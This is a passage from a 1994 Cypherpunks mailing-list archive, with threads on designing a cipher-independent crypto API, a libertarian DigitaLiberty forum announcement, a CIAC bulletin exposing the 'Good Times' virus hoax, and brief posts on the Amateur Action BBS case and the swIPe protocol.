hacking code for themselves or for freely-distributable packages can use. It's a necessary step along the road to "crypto for the masses." - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuTkJioZzwIn1bdtAQFEhwF7Bo0K7ZwWDlYtaB46B4kpwOM/jXY0pLrT Q/y84MBu6Z7nwt75X+r0Y93rpBon1QQh =VWmR -----END PGP SIGNATURE----- From lmccarth at bali.cs.umass.edu Tue Dec 6 14:18:46 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Tue, 6 Dec 94 14:18:46 PST Subject: Dec. 10th Bay Area Cypherpunks Meeting Message-ID: <199412062223.RAA15167@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Ian Farquhar writes: > On Dec 5, 10:28pm, KT Kislitzin wrote: > > This month's Bay Area Cypherpunks Meeting will be held this Saturday, > There isn't a chance that this could either be taped or broadcast, is there? It would be really nice if someone could post minutes/notes from this. - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuTh7Gf7YYibNzjpAQF6nQQAu0dzcPgRtte2N1mANQ8vCj/3R4WjJcLb YsjKuJcSG7ZRLE0ERk0EAR9XUPZuOhTWmMAu0BiTOaVmNkhFNARdv/IKxOrOAWU9 1Xqr5RtP4pJabfDWGND6UFtMpLimHMbdMcy8wHmMnm4XykZcQNG3PwMCymtSqQ3L zDEGiahe7ac= =AF6W - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuTkYioZzwIn1bdtAQGl3AGA0N77HqZuchnssElxWGrDygPX4qLb3F1J Cd2dMlY5XYmAKCwyvocol+e5j/oQ3B/M =XLJD -----END PGP SIGNATURE----- From JLICQUIA at mhc.uiuc.edu Tue Dec 6 14:25:05 1994 From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI)) Date: Tue, 6 Dec 94 14:25:05 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > From: "L. Todd Masco" > I've been thinking a lot recently about how to implement a generic API for > crypto such that the interface could be independent of the cipher used. Here's a few random thoughts: Perhaps we could split the functions into groups according to the purpose of the group. Thus, key generation protocols would be in one group, encryption in another, decryption in another, file I/O routines in another, and so on. This would seem to encourage a more modular approach. It would provide an additional level of abstraction as well; you could implement higher-level actions in terms of lower-level ones. For example, you could implement "PGP-encrypt" in terms of calls to RSA-specific and IDEA-specific functions; from the point of view of the application, however, raw RSA and "PGP-style" encryption would look like two separate implementations of the same API. It could also facilitate certain other types of apps; for example, if we had a "key management" API and implementations of the API for PGP keys and PEM keys, we could easily construct an app that could PGP-encrypt with PEM keys and vice versa. Not to be an OO bigot or anything, but I would implement these as object groups, with the parents defining the API and the children implementing it. As an example, consider this "Key" hierarchy: Key / \ PubKey PrivKey - -> / / \ RSAKey DESKey IDEAKey / \ PGPKey PEMKey The arrow indicates the drawing line between definition and implementation classes. Note the common heritage of PGPKey and PEMKey with RSAKey; this could be used as a mechanism for converting between keys if RSAKey were implemented as a "raw" key, while PGPKey and PEMKey could include other key-specific baggage such as userIDs, attached certificates, etc. Supposedly, then, key management and other stuff could be made specific to the key type, but encrypting and decrypting could consist of a simple: Boolean RSAencrypt(char *message, RSAKey &key); (to use C++ language - substitute your own OOL if desired) and could then use either key format for its dirty work. Of course, this is simplistic, as the encryption engine itself would probably be an object also, etc., etc. There's some very rough ideas! They're in bad need of clarification; let 'em have it! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuTj6DER5KvPRd0NAQE2yAP/dqcaHUXa9UrGpGxWOg+8xs2/AhCh0TS6 0Cca76O6Ztc/vzEpBdz1iAMVa/N7DDybwTHR+wgTPjBEKoy1vqMjSPZpEk2Zwhpy 8EgQvGOHInJrMdlWssEZWn8Av1tSaYJtNrtDV2hTEB9pZSzhIi1T257gqjSrnHks mH3qT0tQTjg= =AXya -----END PGP SIGNATURE----- From bshantz at spry.com Tue Dec 6 14:48:00 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Tue, 6 Dec 94 14:48:00 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <9412062243.AA09569@homer.spry.com> JEFF LICQUIA (CEI) writes: >Not to be an OO bigot or anything, but I would implement these as object >groups, with the parents defining the API and the children implementing >it. As an example, consider this "Key" hierarchy: > Key > / \ > PubKey PrivKey > / / \ > RSAKey DESKey IDEAKey > / \ > PGPKey PEMKey Great Idea!!! I hadn't pictured it this way. My first impresssion was completely wrong and I apologize. Now that I understand and have had a few minutes to think about this. It does look pretty good. Now, about shipping the spec outside the States. Not a problem. We just couldn't ship code or an executable outside the States. This really is a plausible idea. Brad >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S. Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From root at phantom.com Tue Dec 6 15:02:05 1994 From: root at phantom.com (Operator) Date: Tue, 6 Dec 94 15:02:05 PST Subject: Announcing - The DigitaLiberty Forum Message-ID: <9412062258.AA23412@dockmaster.phantom.com> PLEASE RE-DISTRIBUTE THIS AS YOU SEE FIT Friends of Liberty, It is becoming increasingly apparent that the arrival of cyberspace is destined to engender a fundamental discontinuity in the course of human relations. This is a source of great optimism and opportunity for those of us who believe in freedom. Many of you who participate in the lively debates that take place in these forums have seen a number of activist organizations spring up claiming to represent the cause of freedom. And if you are like me you have cheered these groups on only to watch them get bogged down in a quagmire of realpolitics. It is a sad fact that the beast in Washington has evolved into a self-perpetuating engine expert at co-opting the principles of even the most ardent reformers. Slowly but surely all those who engage the system are ultimately absorbed into the mainstream miasma of majoritarianism. For example, what can be more discouraging than watching an organization that started out as a cyber-civil liberties group shift its focus to creating new forms of government entitlements while endorsing intrusive wiretap legislation because they didn't want to jeopardize their influence and prestige amongst the Washington power elite? Some of us believe we can seek ultimate redress at the polls. Many pundits have declared our recent national elections a watershed in politics, a turning point that represents the high water mark of big government. Nonsense. The names have changed, the chairs have been rearranged, but the game remains the same. The so-called "choices" we are presented with are false, hardly better than the mock one-party elections held by failed totalitarian regimes. There must be a better way. I would like to announce the formation of a new group - DigitaLiberty - that has chosen a different path. We intend to bypass the existing political process. We reject consensus building based on the calculus of compromise. Instead we plan to leave the past behind, much as our pioneering forefathers did when they set out to settle new lands. It is our mission to create the basis for a different kind of society. If you would like to join us I invite you to read the information below. Yours in freedom, Bill Frezza Co-founder, DigitaLiberty December 6, 1994 -------------------------------------------------------------------------- *** What is DigitaLiberty? DigitaLiberty is an advocacy group dedicated to the principled defense of freedom in cyberspace. We intend to conduct this defense not by engaging in traditional power politics but by setting an active, persuasive example - creating tangible opportunities for others to join us as we construct new global communities. We believe deeply in free markets and free minds and are convinced that we can construct a domain in which the uncoerced choices of individuals supplant the social compact politics of the tyranny of the majority. *** Is DigitaLiberty a political party or a lobbying group? Neither. DigitaLiberty does not seek to educate or influence politicians in the hope of obtaining legislation favorable to our constituents. We plan to make politicians and legislators irrelevant to the future of network based commerce, education, leisure, and social intercourse. DigitaLiberty does not seek to persuade a majority of the electorate to adopt views which can then be forced upon the minority. We hope to make majoritarianism irrelevant. We invite only like minded individuals to help us build the future according to our uncompromised shared values. *** What do you hope to accomplish? DigitaLiberty is not hopeful that widespread freedom will come to the physical world, at least not in our lifetime. Too many constituencies depend upon the largess and redistributive power of national governments and therefore oppose freedom and the individual responsibility it entails. But we do believe that liberty can and will prevail in the virtual domains we are building on the net and that national governments will be powerless to stop us. We believe that cyberspace will transcend national borders, national cultures, and national economies. We believe that no one will hold sovereignty over this new realm because coercive force is impotent in cyberspace. In keeping with the self-organizing nature of on-line societies we believe we will chose to invent new institutions to serve our varied economic and social purposes. DigitaLiberty intends to be in the forefront of the discovery and construction of these institutions. *** But what about the construction of the "Information Superhighway"? The fabric of cyberspace is rapidly being built by all manner of entities espousing the full range of political and economic philosophies. While political activity can certainly accelerate or retard the growth of the net in various places and times it cannot stop it nor can it effectively control how the net will be used. Our focus is not on the institutions that can and will impact the building of the physical "information highway" but on those that will shape life on the net as an ever increasing portion of our productive activities move there. *** What makes you think cyberspace will be so different? The United States of America was the only country in history ever to be built upon an idea. Unfortunately, this idea was lost as we slowly traded away our liberties in exchange for the false promise of security. DigitaLiberty believes that technology can set us free. The economies of the developed world are now making a major transition from an industrial base to an information base. As they do, the science of cryptology will finally and forever guarantee the unbreachable right of privacy, protecting individuals, groups, and corporations from the prying eyes and grasping hands of sovereigns. We will all be free to conduct our lives, and most importantly our economic relations, as we each see fit. Cyberspace is also infinitely extensible. There will be no brutal competition for lebensraum. Multiple virtual communities can exist side by side and without destructive conflict, each organized according to the principles of their members. We seek only to build one such community, a community based on individual liberty. Others are free to build communities based on other principles, even diametrically opposed principles. But they must do so without our coerced assistance. Effective communities will thrive and grow. Dysfunctional communities will wither and die. And for the first time in human history, rapacious societies will no longer have the power to make war on their neighbors nor can bankrupt communities take their neighbors down with them. *** What does this have to do with my real life? I can't eat data. I don't live in a computer. Yes, but imagine the ultimate impact of mankind's transition from an agrarian economy to an industrial economy to an information economy. Our founding fathers would have consider anyone insane who predicted that a nation of 250 million could feed itself with fewer than 3% of its citizens involved in agriculture. Similarly, economist and politicians trapped in the policies of the past lament our move from a manufacturing economy to a knowledge worker and service based economy. We see this as a cause to rejoice. The day will come when fewer than 5% of the citizens of a nation of 1 billion will be involved in manufacturing - if we still bother calling geographically defined entities "nations". What will the rest of us be doing? We will be providing each other with an exploding array of services and we will be creating, consuming, and exchanging information. Most of this will occur entirely within or be mediated at least in part by our activities in cyberspace. Many of us will earn a very good living on the net. Our race, our religion, our gender, our age, our physical appearance and limitations will all be irrelevant and undetectable. Hard working individuals from underdeveloped nations who in the past might have been forced to emigrate in search of economic freedom and opportunity can now build productive lives in cyberspace. And much if not all of the wealth we create that we do not transform into visible physical assets will be ours to keep and use, beyond the grasp of sovereigns. *** What is the purpose of this forum? The DigitaLiberty Forum is a place where like minded individuals can share their views, observations, and strategies related to the development of virtual communities based on freedom. It is a place where people can exchange information and advice about how they have developed extra-territorial business and social relationships - away from the influence and outside the jurisdiction of governments. It is a forum for the posting of essays, questions, and ideas on the topic of liberty. It is a place where we can meet and debate the forms that our new institutions might take and discuss the practical problems and responsibilities that freedom entail. In time as our technology matures some of us will move on to more ambitious projects, launch other programs, and begin our virtual migration from the swamp of coerced collectivism. Best of all, there will be no need to physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'. We can all participate in this exodus without hastily quitting our jobs or disrupting our lives. And as a larger and larger portion of our economic and social activities move onto the net we will create a new society, open to all with the will to enter. This new world will be interleaved with the physical world in which we now live and yet will be separate. And free. Join us as we begin the journey. *** Who can join DigitaLiberty? The DigitaLiberty Forum is open to anyone that can honestly answer yes to the following two questions: 1) I renounce the use of coercive force as a tool of social or economic policy. 2) I do not derive the majority of my income from funds taken from taxpayers. *** How do I join DigitaLiberty? If you qualify, send a message to DigitaLiberty-request at phantom.com with the words "SUBSCRIBE" in the subject line and the message body as follows SUBSCRIBE DigitaLiberty And welcome to the future. ### From warlord at MIT.EDU Tue Dec 6 15:05:51 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Tue, 6 Dec 94 15:05:51 PST Subject: GUCAPI (Grand Unified Crypto API) In-Reply-To: <199412062119.QAA14522@bb.hks.net> Message-ID: <9412062305.AA04906@yaz-pistachio.MIT.EDU> -----BEGIN PGP SIGNED MESSAGE----- To: "L. Todd Masco" cc: cypherpunks at toad.com Subject: Re: GUCAPI (Grand Unified Crypto API) > I've been thinking a lot recently about how to implement a generic API for > crypto such that the interface could be independent of the cipher used. > What I'm thinking of is something like: Why do all this? There already exists a Generic Security System API, GSSAPI, which is an Internet standard (or there is at least an Internet Draft -- I'm not sure what the current status is right now, and given that the IETF is going on this week, it's status may change). Currently, the only GSSAPI bindings I know of are for Kerberos V5 and Kerberos V4, although there could easily be bindings for RSA, PGP, or whatever you want. I suggest you read up on GSSAPI, which provides much of the functionality that you want, plus a lot more. You would just have to write a PGP binding to get it to work, but that shouldn't be too difficult (I haven't looked at this). It'll be even easier when there is a PGP API. - -derek -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBuAwUBLuTtwTh0K1zBsGrxAQH72wLEDRSmfcIj4ksSSTEUES48N82ZTLUXFTz3 cF8nCbQVkowjHQKkjeGmRZJV3eDTYVPaAMoDUZ+jIogsg2JnVDJxmseyDWmDPV86 Pgeljv/TbmbAwxAQu7bcbEY= =2mTL -----END PGP SIGNATURE----- From karyn at cheetah.llnl.gov Tue Dec 6 15:26:51 1994 From: karyn at cheetah.llnl.gov (Karyn Pichnarczyk) Date: Tue, 6 Dec 1994 15:26:51 -0800 Subject: CIAC Notes 94-04 Message-ID: <625d544b2ec4a34567e43939c27c7f16@NO-ID-FOUND.mhonarc.org> U.S. DOE's Computer Incident Advisory Capability ___ __ __ _ ___ __ __ __ __ __ / | /_\ / |\ | / \ | |_ /_ \___ __|__ / \ \___ | \| \__/ | |__ __/ Number 94-04 December 6, 1994 ------------------- A - T - T - E - N - T - I - O - N ------------------- | CIAC is available 24-hours a day via its two skypage numbers. To use | | this service, dial 1-800-759-7243. The PIN numbers are: 8550070 (for | | the CIAC duty person) and 8550074 (for the CIAC manager). Please keep | | these numbers handy. | ------------------------------------------------------------------------- Welcome to the fourth issue of CIAC Notes! This is a special edition to clear up recent reports of a "good times" virus-hoax. Let us know if you have topics you would like addressed or have feedback on what is useful and what is not. Please contact the editor, Allan L. Van Lehn, CIAC, 510-422-8193 or send E-mail to ciac at llnl.gov. $-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$ $ Reference to any specific commercial product does not necessarily $ $ constitute or imply its endorsement, recommendation or favoring by $ $ CIAC, the University of California, or the United States Government.$ $-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$ THE "Good Times" VIRUS IS AN URBAN LEGEND In the early part of December, CIAC started to receive information requests about a supposed "virus" which could be contracted via America OnLine, simply by reading a message. The following is the message that CIAC received: --------------------------------------------------------------------------- | Here is some important information. Beware of a file called Goodtimes. | | | | Happy Chanukah everyone, and be careful out there. There is a virus on | | America Online being sent by E-Mail. If you get anything called "Good | | Times", DON'T read it or download it. It is a virus that will erase your | | hard drive. Forward this to all your friends. It may help them a lot. | --------------------------------------------------------------------------- THIS IS A HOAX. Upon investigation, CIAC has determined that this message originated from both a user of America Online and a student at a university at approximately the same time, and it was meant to be a hoax. CIAC has also seen other variations of this hoax, the main one is that any electronic mail message with the subject line of "xxx-1" will infect your computer. This rumor has been spreading very widely. This spread is due mainly to the fact that many people have seen a message with "Good Times" in the header. They delete the message without reading it, thus believing that they have saved themselves from being attacked. These first-hand reports give a false sense of credibility to the alert message. There has been one confirmation of a person who received a message with "xxx-1" in the header, but an empty message body. Then, (in a panic, because he had heard the alert), he checked his PC for viruses (the first time he checked his machine in months) and found a pre-existing virus on his machine. He incorrectly came to the conclusion that the E-mail message gave him the virus (this particular virus could NOT POSSIBLY have spread via an E-mail message). This person then spread his alert. As of this date, there are no known viruses which can infect merely through reading a mail message. For a virus to spread some program must be executed. Reading a mail message does not execute the mail message. Yes, Trojans have been found as executable attachments to mail messages, the most notorious being the IBM VM Christmas Card Trojan of 1987, also the TERM MODULE Worm (reference CIAC Bulletin B-7) and the GAME2 MODULE Worm (CIAC Bulletin B-12). But this is not the case for this particular "virus" alert. If you encounter this message being distributed on any mailing lists, simply ignore it or send a follow-up message stating that this is a false rumor. Karyn Pichnarczyk CIAC Team ciac at llnl.gov ------------------------------ Contacting CIAC If you require additional assistance or wish to report a vulnerability, call CIAC at 510-422-8193, fax messages to 510-423-8002 or send E-mail to ciac at llnl.gov. For emergencies and off-hour assistance, call 1-800-SKY-PAGE (759-7243) and enter PIN number 8550070 (primary) or 8550074 (secondary). The CIAC Duty Officer, a rotating responsibility, carries the primary skypager. The Project Leader carries the secondary skypager. If you are unable to contact CIAC via phone, please use the skypage system. ------------------------------ This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. ------------------------------ End of CIAC Notes Number 94-04 94_12_06 **************************************** From cactus at hks.net Tue Dec 6 15:43:16 1994 From: cactus at hks.net (L. Todd Masco) Date: Tue, 6 Dec 94 15:43:16 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <199412062348.SAA16082@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Derek Atkins writes: > Why do all this? There already exists a Generic Security System API, > GSSAPI, which is an Internet standard (or there is at least an Internet > Draft -- I'm not sure what the current status is right now, and given > that the IETF is going on this week, it's status may change). Ah, I knew of the GSSAPI's existence but hadn't realized that its scope included what I wanted. I'll read the draft on the internic and see if it does what I want. If so, the next logical step is to wrap RSAREF in it and to make a PGPish-wraparound. I'd certainly be up to the former; Would anybody else be interested in ponying up their time and effort for the PGP instance? (The draft is ftpable from ftp.internic.net, /internet-drafts/draft-ietf-cat-gssv2-00.txt) - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuT4LCoZzwIn1bdtAQHh9wF/TyMkm4Cd0gFzk26mdufgytY6NnHfiT3C heS9ACR9d8jwS2pu8/wvF84+sQs0nTEc =bY6Z -----END PGP SIGNATURE----- From maschino at phx.sectel.mot.com Tue Dec 6 15:43:35 1994 From: maschino at phx.sectel.mot.com (Mike Maschino) Date: Tue, 6 Dec 94 15:43:35 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <9412062344.AA14068@ phx.sectel.mot.com> (This is my first attempt at posting, please excuse any errors, and I do not yet have PGP on my employer-owned machine) > I've been thinking a lot recently about how to implement a generic API for > crypto such that the interface could be independent of the cipher used. > What I'm thinking of is something like: There are numerous industry groups working on a "security" API, including Microsoft, Novell, Motorola, Intel, etc. Major focus is transparent (to the user) security (encryption, KCA, signatures, etc) for email, local and remote file access, generalized and integrated telephony, and so forth. Of course, there are many approaches, generation by committee, personal and corporate biases, and other garbage to get in their way. What may be interesting is to look at their proposed security APIs and glean interesting ideas to be incorporated into your API. Some ideas on effective APIs: - the process of encryption/decryption, signaturing, etc should be independent of the destination/source of the data. The same API should be able to process a file, an e-mail message, an inter-process control message, etc. The API does not care what the data is from or for, it just operates on it. Of course, the API should be able to process in the various encryption modes, and may have to discriminate between a continuous flow of data and a finite size of data. - API's at this level must NEVER directly utilize the User Interface (regardless of whether the UI is graphical or textual). It should be completely irrelevant to the API whether it was invoked by an actual user, a local system process, or a remote system process. Return and error conditions are returned to the caller, which then decides what to do with the erroneous result. Error traps are acceptable too, though the trap should allow the "trapper" to decide what to do about notification or handling of the error. Of course, you recognize the hardest API is key management. Use some data and/or object modeling techniques to handle the two basic senarios and see if you can generalize it sufficiently. I have no idea about how to get the group's proposed API's. There has been several mentions in the networking trade papers about them though. Windows 95 and NT WILL have a security API based in part on the existing one worked out with Novell. Of course, security is a local issues as well as a networking or messaging issue, so I doubt their implementation will be thorough. Hope this is of some help. - Mike ***************************************************************************** Mike Maschino Email: Mike_Maschino-P17960 at email.mot.com Motorola | "I am not speaking for my employer, Government and Systems Technology Group | and they do not speak for me" Scottsdale, AZ, USA | "Neuro-encrypto-psycho-telco-photo-proto-nympho-lego -maniacs wanted by same; applications available; god-like entities always welcome" ***************************************************************************** From M.Gream at uts.EDU.AU Tue Dec 6 16:04:34 1994 From: M.Gream at uts.EDU.AU (Matthew Gream) Date: Tue, 6 Dec 94 16:04:34 PST Subject: GUCAPI (Grand Unified Crypto API) In-Reply-To: <9412062142.AA08621@homer.spry.com> Message-ID: <199412070002.AB13209@sequoia.itd.uts.EDU.AU> `bshantz at spry.com' wrote: > > Anyone else have any comments? > QoS considerations. If the purpose of the API is to allow polymorphic access to cryptographic operations, then you need to provide a method to select `methods' based on particular needs (you're the client, you want the assocation to meet specific contractual requirements). For example, you may specify key bounds or block sizes. At the same time, you need to reduce the interfaces complexity and overhead, which could mean for example that `limited' implementation could do without the QoS aspects; ie. elements need to be clearly seperable and orthogonal. For example, I could envisage: resp_t skcs_open (skcs_ctx * ctx, void * name, uint name_sz, uint name_type, bucket * qos, bucket * param) resp_t skcs_process (skcs_ctx * ctx, void * iblock, uint iblock_sz, unit * iblock_pos, void * oblock, uint oblock_sz, uint * oblock_pos, bitstring options) resp_t skcs_close (skcs_ctx * ctx, bitstring options) where: typedef struct bucket_str { struct bucket_str * next; void * data; uint type; uint length } bucket; and qos types could include: QOS_KEYSZ_MIN, QOS_KEYSZ_MAX, QOS_KEYSZ_RANGE, QOS_INBLOCKSZ_MIN, .... param types could include: PARAM_KEY, PARAM_IV, PARAM_FEEDBACK_BITS or something like that. But by the same token, you'd want to ensure that there is something like the following so the additional overhead of chained buckets could be avoided. resp_t skcs_set_param (skcs_ctx * ctx, void * data, uint type, uint length) The point is that the provision of such a `generic' method of specifying attributes lends itself to support a diverse set of algorithms and cryptographic modules. The `skcs_open' could well be a subset of a more generic `crypto_open'. By the same token, there could exist a `skcs_DES_open' and `skcs_IDEA_open' for use when you know the specific algorithm you want and want to avoid additional overheads. I'm only considering a cryptographic operations interface, not one that deals with more generic `security' operations, such as in GSSAPI. But there are plenty of issues to be examined and resolved. discuss away! mg. -- Matthew Gream (sw/hw engineer) (02) 821-2043 From M.Gream at uts.EDU.AU Tue Dec 6 16:15:47 1994 From: M.Gream at uts.EDU.AU (Matthew Gream) Date: Tue, 6 Dec 94 16:15:47 PST Subject: GUCAPI (Grand Unified Crypto API) In-Reply-To: <199412062348.SAA16082@bb.hks.net> Message-ID: <199412070014.AA13652@sequoia.itd.uts.EDU.AU> `"L. Todd Masco"' wrote: > Ah, I knew of the GSSAPI's existence but hadn't realized that its scope > included what I wanted. I'll read the draft on the internic and see > if it does what I want. If so, the next logical step is to wrap RSAREF > in it and to make a PGPish-wraparound. > > I'd certainly be up to the former; Would anybody else be interested in > ponying up their time and effort for the PGP instance? (The draft > is ftpable from ftp.internic.net, > /internet-drafts/draft-ietf-cat-gssv2-00.txt) > Ohh, I misinterpreted. You're talking about a high level interface that assumes cryptographic operations are already being used for specific purposes (ie. `signature', `GetMIC', `VerifyMIC', `Wrap', `Unwrap'). I was thinking more about the layer below this, the primitive operations that don't make assumptions on what the user is going to do; and limitations placed thereupon. ps. In the middle of the year I worked on a Radio Show that delved into the PGP and Clipper debarcle, it was titled `Tales from the Crypt'. Subsequently I submitted it for a Government sponsored contest for excellence in technical, science and engineering journalism. I found out yesterday that I've taken out a prize for the best work conducted by someone under the age of 26. There is a certain irony in being awarded the prize by a Government department :-). -- Matthew Gream (sw/hw engineer) (02) 821-2043 From mpd at netcom.com Tue Dec 6 16:35:38 1994 From: mpd at netcom.com (Mike Duvos) Date: Tue, 6 Dec 94 16:35:38 PST Subject: AABBS Conviction relation to child porn? In-Reply-To: <0098881E.4950521B.51@INS.INFONET.NET> Message-ID: <199412070035.QAA18461@netcom13.netcom.com> ED KELLY writes: > There is hoopla over the convictions of those who ran the > Amateur Action BBS. The actual charges involve stuff that > sounded like it was intended to be distributed as child > pornography. The indictment described the offensive material > being destributed as follows in each count: I think you have your wires crossed here. There was no claim made that the models were underage in any of the erotica you cite. The material was deemed to be obscene because it depicted things such as incest, bestiality, foreign object insertion, piercing, and other non-mainstream sexual themes. Everyone was over 18 in all the pictures you mention, and the only material on the BBS which depicted children was legal nudist material scanned from reputable sources. Since the original complaint from the "outraged citizen" which prompted the investigation and subsequent entrapment was about nudist GIFs, which were perfectly legal, one might argue that the obscenity charges were just an indirect way to nail AA for daring to have nude kid pix available on their BBS. Certainly there are plenty of places in Tennesee where "specialty" erotica can be purchased which are not being prosecuted with similar zeal. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From alex at omaha.com Tue Dec 6 16:43:46 1994 From: alex at omaha.com (Alex Strasheim) Date: Tue, 6 Dec 94 16:43:46 PST Subject: swIPe Message-ID: <199412070044.SAA00308@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- Has anything been happening with swIPe lately? I seem to remember reading a couple of months ago that the protocol was being revised (simplified?) and that a new RFC was going to be released soon. What's the status of the project now? == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuUFUREpP7+baaPtAQGKGQP/UN7bJfYOHIEdgV9uDnJLbJ00q4J/opLW KpDxF+yl4Nhld70YkMQ/xJ9CeGh0mrCNLz/O8nD4KLrJ87RnH2T1fMV6vdegEvxF CnDEOyRCSEa3kB3c1mkP5rtvW9PJF6GiqDkbaA86wa2usBkuv63mZjPc4EVLiZwY +0xew1PgMQs= =oHAW -----END PGP SIGNATURE----- From pfinerty at seattleu.edu Tue Dec 6 16:50:16 1994 From: pfinerty at seattleu.edu (being) Date: Tue, 6 Dec 94 16:50:16 PST Subject: Announcing - The DigitaLiberty Forum In-Reply-To: <9412062258.AA23412@dockmaster.phantom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > *** Who can join DigitaLiberty? > > The DigitaLiberty Forum is open to anyone that can honestly answer yes to the > following two questions: > > 1) I renounce the use of coercive force as a tool of social or economic > policy. well, i guess i can't join! as a grad student all of you pay me (or my advisor i should say) to learn how to cure all of this worlds awful diseases...right. I cannot fathom people who seem to insist on taking their doses of reality rectally. 5150 pfinerty at bach.seattleu.edu finerty at msscc.med.utah.edu finger any acct. for pgp key pfinerty at nyx10.cs.du.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBLuUGT7Jv5rDIkn05AQHmlgH9FBc6rGvC7FzZx3HtsadPi9SZ9u8mtwl8 t0Gr3baJYp7fotb+tVJ5NYBSRi4mAKqmVyZw9jG+dzv18Ku3/Zxxgw== =/uOS -----END PGP SIGNATURE----- From jya at pipeline.com Tue Dec 6 17:24:18 1994 From: jya at pipeline.com (John Young) Date: Tue, 6 Dec 94 17:24:18 PST Subject: NYT on N2 and Star Wars Message-ID: <199412070123.UAA18255@pipe3.pipeline.com> Some cries of no-gets of N2_duh and RAY_dem. N=N lobbed by 8 PM EST. No get, retry. Frantic PBM sez excuse this msg. From cactus at seabsd.hks.net Tue Dec 6 18:38:40 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 6 Dec 94 18:38:40 PST Subject: GUCAPI (Grand Unified Crypto API) Message-ID: <199412070243.VAA17789@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412070014.AA13652 at sequoia.itd.uts.EDU.AU>, Matthew Gream wrote: >Ohh, I misinterpreted. You're talking about a high level interface that >assumes cryptographic operations are already being used for specific >purposes (ie. `signature', `GetMIC', `VerifyMIC', `Wrap', `Unwrap'). > >I was thinking more about the layer below this, the primitive operations >that don't make assumptions on what the user is going to do; and >limitations placed thereupon. Actually, both interfaces are reasonable for the scope of this discussion. I don't have specific goals in mind yet: I want to bounce around ideas before coming up with something more specific. The GSSAPI has the advantage that Kerberbos services have already been provided for that API: There's no reason, however, that the two goals need to be mutually exclusive. I'll have to read the GSSAPI doc carefully and get a sense of what problems it solves. >I found >out yesterday that I've taken out a prize for the best work conducted >by someone under the age of 26. There is a certain irony in being >awarded the prize by a Government department :-). Nevertheless, congratulations! - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuUhSyoZzwIn1bdtAQFmRwF7BtmxdCQCHirWle87iUsqz2GnCt+dSvCR JzONMasccbF08lWnfRc0ACAQNyQIfEkD =L3dn -----END PGP SIGNATURE----- From perry at imsi.com Tue Dec 6 18:53:53 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 6 Dec 94 18:53:53 PST 